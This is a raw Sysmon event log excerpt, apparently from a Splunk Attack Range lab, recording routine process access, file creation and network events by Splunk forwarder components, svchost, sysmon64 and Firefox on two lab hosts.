354300x80000000000000001051652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:17.787{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51111-false10.0.1.12-8000- 23542300x80000000000000001051651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:25.150{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E81A999385FE3CE7DF870A7F6905B7D,SHA256=A58E41F6E4E6AD556F2E0A9BA10E5DEB593FD91A10227B0CD422DF1198C275A7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808705Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.978{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F622-60EB-A179-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808704Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:26.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808703Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808702Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:26.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808701Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808700Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:26.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808699Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808698Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:26.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808697Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808696Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:26.978{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808695Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.978{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F622-60EB-A179-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808694Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.978{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F622-60EB-A179-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808693Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.963{0C1E0330-F622-60EB-A179-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808692Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.728{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C25FA71A45D82202914ECDC4A1B16DC6,SHA256=F9A50FF3F27C85EE0FC9375EEC1887F386C1AAFFFAA96E79355E44A6CBF79520,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808691Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.587{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A1AEB11D4E9A50B643D723598922C81B,SHA256=997A7EC367F12C167D9868113D6C200811FCD05A1043B3474503E7E52C5DB2F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C59DE65A8DF13EFF412D506D7565CC24,SHA256=60E9E6892734D850B991551D00EA5764869182456B55F339B92244B6EA0A1CEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F662DBB416DE8E2C915EA76F94D33D8F,SHA256=FE2F3562B8DDF37EF94C071A980FC2FB289992FE0D8C2B7BC094D67F19947F6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CE8622650583C24DC19FAD06BCF02FD1,SHA256=86C2A12C17DDB6935FB787C604732200380AB54AA14D9991B726A392BCA6D9EC,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001051661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=63654E91D6A4512D994277A57CAF46CF,SHA256=A2D02482B632F4BB711036BECE51F99E0DEBE6257160E4D29B09188DF3A65426,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=64518819625BF192C6891091535154A8,SHA256=1C1386C7BB946209F585658BA1D1951A2F8C09174619801F199AB8F2B634D562,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=18DBBA10F0C61F1F10475DB085CEA8E9,SHA256=997B0607F74F2BBB610CC485BD71B42F81F06123916A8FD9C802F4C6EB9047B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=94C0C1A2E93BF854DB197CB78A7C4BCE,SHA256=FD95329C811CFA6DAB47ED60412B5A9E8DDFDC431E3663976522255B4AB83653,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001051657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=403138F5D064703128BF44559896A86C,SHA256=9F92CA482B049004E855FB11CB8E11518FEF862A2E3DB2A5E1EFC14CA9651DF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A32A7BFCB74C34E76FC2277DE8220D5B,SHA256=69C5714FABE056C30FB1C4FFE6B9B47ABE24BADC1D6C56951C85CA9C61E34DA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EE2F1F022ED03624E4325BD0772D85AD,SHA256=05A2749AEA80A901EE9B929E3162922744FFE78AFDC48197A859A7EDCC161436,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.480{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=655EF5F1A7D27EE88DC3AC1209ED1D3C,SHA256=698A8DE604AA2E2C07D8FD85C4D9B645A173CE596B3533FA8FDB931A7C9505EC,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001051653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:26.165{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD58B0CB9252FEAF64B5959809B0D960,SHA256=3E39898429CEA422B1F71A0CC498E1614B2601BC7CDD9E014A71CBC913770FB3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808690Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.290{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F622-60EB-A079-00000000D001}2164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808689Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:26.290{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808688Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.290{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808687Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:58:26.290{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808686Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:26.290{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808685Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
